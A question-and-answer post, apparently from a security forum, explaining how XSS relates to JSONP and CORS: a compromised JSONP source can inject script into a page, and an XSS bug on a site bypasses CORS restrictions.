Does CORS and XSS have any connection?

Question

Cross-site scripting (XSS) is mentioned in the Wikipedia page for CORS. But I don\'t see how they are related. What\'s the connection between CORS and XSS?

Answer 1

XSS is mentioned on the Wikipedia article in relation to JSONP, not CORS.

In JSONP you reference a page containing data you want to include client side in your page like so:

You then have a JavaScript function on your page called foo that will be called by the external site (example.com in this case) to pass the data through that your client-side requires.

However, if example.com gets compromised and as you are trusting example.com as a source of scripts an attacker can take your site with it and own the client side code. For example, they could be redirecting visitors to their own site, sending themselves your visitors' cookies or injecting Javascript keyloggers instead of calling your foo function.

With CORS though, if example.com sets the correct headers to allow your site to make AJAX calls to it and retreive the data, then as you should be treating the data as untrused input rather than HTML, it is less likely that your site is neccessarily compromised. It does depend on what the data is - if it is in fact preformatted HTML and you are outputting it as is then then a compromised external site could still affect yours via XSS - however, this is definitely the case with JSONP.

Another point is that if there are any XSS bugs on your site, it would make any CORS restrictions irrelevant. The attacking website would be able to use the XSS vuln to "bypass" the Same Origin Policy at DOM level rather than via XHR. If they needed some information that can only be retrieved from your origin by an AJAX request, they would simply use the XSS attack to inject the script required to do this and send it back to their own domain.